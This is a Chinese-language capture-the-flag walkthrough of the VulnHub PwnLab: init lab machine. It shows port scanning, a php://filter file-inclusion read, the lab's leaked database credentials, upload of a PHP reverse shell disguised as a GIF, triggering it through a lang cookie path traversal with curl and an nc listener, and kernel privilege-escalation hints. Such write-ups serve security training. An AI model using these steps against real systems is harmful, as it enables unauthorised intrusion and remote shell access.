安装靶机

下载地址：https://www/vulnhub.com/entry/pwnlab-init,158/

信息收集：

收集靶机ip地址，由于搭建在本地使用kali自带命令

arp-scan -l

nmap 扫描端口，服务

nmap -sV -p 1-65535 -A 靶机ip地址

 

漏洞探测

访问80端口地址，查找可利用的功能点

发现存在upload,不过需要登录

发现一个规律每次切换网页时，存在page=，思考是否存在文件包含漏洞

 

 发现page=index，网页挂了，证明page=后面的参数可控，试试php伪协议是否可用

file协议：

用法:

file:/ 跟要访问的文件

 网页没结果

php://filter

php://filter/read=convert.base64-encode/resource=config

 有一串返回值，使用base_64解密看看

 信息收集时，发现mysql 3306端口开放，这里试试得到的账号密码是否可用

$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";

成功登录mysql数据库，

 查找有没有可用的账号密码，登录web，利用文件上传webshell

 拿到账号密码，解密

kent                  JWzXuBJJNy

登录web,尝试上传一句话木马

 发现存在后缀，以及type类型检测，修改webshell

 加后缀，GIF

 成功上传，利用F12查找文件上传路径，

 尝试使用webshell工具连接，这里我使用的是哥斯拉

 连接不上

换一个思路，利用kali，自带的php马，改点东西

位置：

/usr/share/webshells/php

 vim /tmp/php-reverse-shell.php

文件头改成GIF

 改个名

名字自取，后缀改成xx.php.gif

尝试上传

同上，查找文件上传路径，用php伪协议查看源码

发现源码里存在'可用Cookie 参数名lang 进行命令执行

 

kali开启监听,端口为刚刚木马里的端口

nc -lvp 1234                    

利用curl 执行木马

curl -v --cookie:"lang=../upload/7a68f219a5fc219beb832ab642246933.gif" 靶机ip

 

 linux提权

信息收集，漏洞探测

说一下思路吧，我的环境有问题，提权这一步执行exp，环境老崩溃，重启后得重新来过

前期：信息收集

使用优秀工具，github一大堆

漏洞探测：

这里推荐一个，linux-exploit-suggester-2，github有直接搜

下载好之后，里面是linux-exploit-suggester-2.pl文件，利用kali开启apache服务,将文件复制到var/www/html

service apache2 start

在webshell页面wget下载，赋予执行权限，跑一下脚本，注意：将文件上传到/tmp目录，老生常谈了，到这里，脚本跑了之后发现存在三个CVE漏洞

利用内核漏洞溢出，利用exp直接getshell,简简单单！